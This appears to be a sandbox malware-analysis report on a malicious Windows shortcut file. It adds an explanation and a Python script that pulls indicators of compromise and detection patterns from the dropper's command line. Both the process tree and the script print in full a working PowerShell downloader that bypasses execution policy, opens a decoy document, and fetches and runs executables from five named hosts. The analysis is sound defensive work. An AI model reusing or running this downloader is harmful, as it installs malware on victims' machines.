Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/05/2024, 11:07

General

  • Target

    105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk

  • Size

    2KB

  • MD5

    105e49bf1a9ac6a8f095ca1e9dfa5958

  • SHA1

    ec9174ecb7de3a9ff2005dc726f4629e645d89d1

  • SHA256

    18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1

  • SHA512

    194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; }; notepad.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2552
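
What the powershell.exe command line above does, read top to bottom: it runs with -ExecutionPolicy ByPass and -NoProfile, writes 2000 random characters into %TEMP%\a.doc and opens it with Start (which is why WINWORD.EXE appears as the child process, a decoy document for the victim), creates %TEMP%\a.txt as a run-once marker, then for $n = 1 and 2 walks a list of five hosts requesting http://<host>/counter/?<token><n>, saving the response as %TEMP%\a<n>.exe. A download is only executed if the file is larger than 10000 bytes (so an error page or empty response is skipped), the index of the host that answered is kept in $ld so the second fetch starts there, and notepad.exe is launched at the end. No a1.exe/a2.exe appears under Downloads, so the payload was not retrieved during this run.

The following Python script is an added example, not part of the tria.ge report: it parses that recorded command line and extracts the IoCs (hosts, every candidate URL, dropped paths, the size gate) plus a small set of behavioural indicators that generalise to other LNK-to-PowerShell droppers. The command line is copied from the process tree; the function names and the indicator list are my own.

```python
"""Pull IoCs and behavioural indicators out of the PowerShell downloader
command line recorded in the process tree above (PID 2904)."""
import re

# Command line of powershell.exe exactly as recorded by the sandbox, split
# into adjacent string literals only for readability.
CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile '
    r"-command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; "
    r"$ld = 0; $cs = [char]92; $fn = $env:temp+$cs; "
    r"$ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; "
    r"$dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; "
    r"if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); "
    r"if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { "
    r"$gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; "
    r"for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); "
    r"if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; }; notepad.exe"
)

# Behavioural indicators (my own list, not a published rule set).
INDICATORS = {
    "execution policy bypass": r"-ExecutionPolicy\s+bypass",
    "profile suppressed": r"-NoProfile",
    "WebClient download": r"Net\.WebClient|DownloadFile|DownloadString",
    "writes to %TEMP%": r"\$env:temp",
    "launches downloaded file": r"\bStart(-Process)?\s+\$|Invoke-Item",
    "decoy document": r"\.docx?\b",
}


def extract_flags(cmd):
    """powershell.exe switches that disable policy or profile (the usual LNK-dropper tell)."""
    return re.findall(r"-(ExecutionPolicy \S+|NoProfile|NonInteractive|NoLogo|WindowStyle \S+)", cmd, re.I)


def extract_domains(cmd):
    """The $ll array: fallback hosts the script rotates through."""
    m = re.search(r"\$ll\s*=\s*((?:'[^']*'\s*,\s*)*'[^']*')", cmd)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def extract_path(cmd):
    """The URI prefix ($gop) to which the loop counter $n is appended."""
    m = re.search(r"\$gop\s*=\s*'([^']+)'\s*\+\s*\$n", cmd)
    return m.group(1) if m else ""


def loop_count(cmd):
    """Upper bound of the $n loop: how many payloads the script tries to fetch."""
    m = re.search(r"\$n\s*-le\s*(\d+)", cmd)
    return int(m.group(1)) if m else 1


def size_threshold(cmd):
    """Minimum body size before a download is executed (filters error pages)."""
    m = re.search(r"\.length\s*-gt\s*(\d+)", cmd)
    return int(m.group(1)) if m else 0


def candidate_urls(cmd):
    """Every URL the script can request: outer loop over $n, inner loop over hosts."""
    path = extract_path(cmd)
    return [f"http://{host}{path}{n}"
            for n in range(1, loop_count(cmd) + 1)
            for host in extract_domains(cmd)]


def dropped_files(cmd):
    """Paths written under %TEMP%: fixed names plus the per-$n executable names."""
    fixed = re.findall(r"\$fn\+'([^']+\.\w+)'", cmd)           # 'a.doc', 'a.txt'
    m = re.search(r"\$fn\+'([^']+)'\+\$n\+'([^']+)'", cmd)    # 'a' + $n + '.exe'
    per_n = [f"{m.group(1)}{n}{m.group(2)}"
             for n in range(1, loop_count(cmd) + 1)] if m else []
    return ["%TEMP%\\" + name for name in fixed + per_n]


def match_indicators(cmd):
    """Names of the INDICATORS whose pattern occurs in the command line."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, cmd, re.I)]


def report(cmd):
    """Everything a responder would block or hunt for, as one dict."""
    return {
        "flags": extract_flags(cmd),
        "hosts": extract_domains(cmd),
        "urls": candidate_urls(cmd),
        "dropped": dropped_files(cmd),
        "min_payload_bytes": size_threshold(cmd),
        "indicators": match_indicators(cmd),
    }


if __name__ == "__main__":
    for key, value in report(CMDLINE).items():
        print(f"{key}: {value}")
```

The URL list is the full cross product of hosts and counter values, which is what to feed a proxy blocklist: the script's $ld shortcut only changes the order in which hosts are tried, not the set. The 10000-byte gate is worth remembering when replaying the download in a sandbox, since a sinkhole that answers with a small page will never trigger the execution branch.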

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\a.doc

    Filesize

    3KB

    MD5

    259d4d0838b6e0df6374c5c81d213f54

    SHA1

    7d24482a10d90e71a275f42a92987879042c428f

    SHA256

    e7b3fbcacb8348b511ab51c48727f0c5d448185a2cbb84e7485b67f1efff24ae

    SHA512

    c540fbd80875d6538182152ad23afb25bb2c35eb3aacd28e28872b8f6584dbfc8372c1a0e3325a8fca79ad99972b0193197821d039a28eab721f7b2eeab2c6bc

  • memory/2552-46-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2904-38-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp

    Filesize

    4KB

  • memory/2904-39-0x000000001B160000-0x000000001B442000-memory.dmp

    Filesize

    2.9MB

  • memory/2904-40-0x0000000002740000-0x0000000002748000-memory.dmp

    Filesize

    32KB

  • memory/2904-41-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-43-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-44-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-45-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-56-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB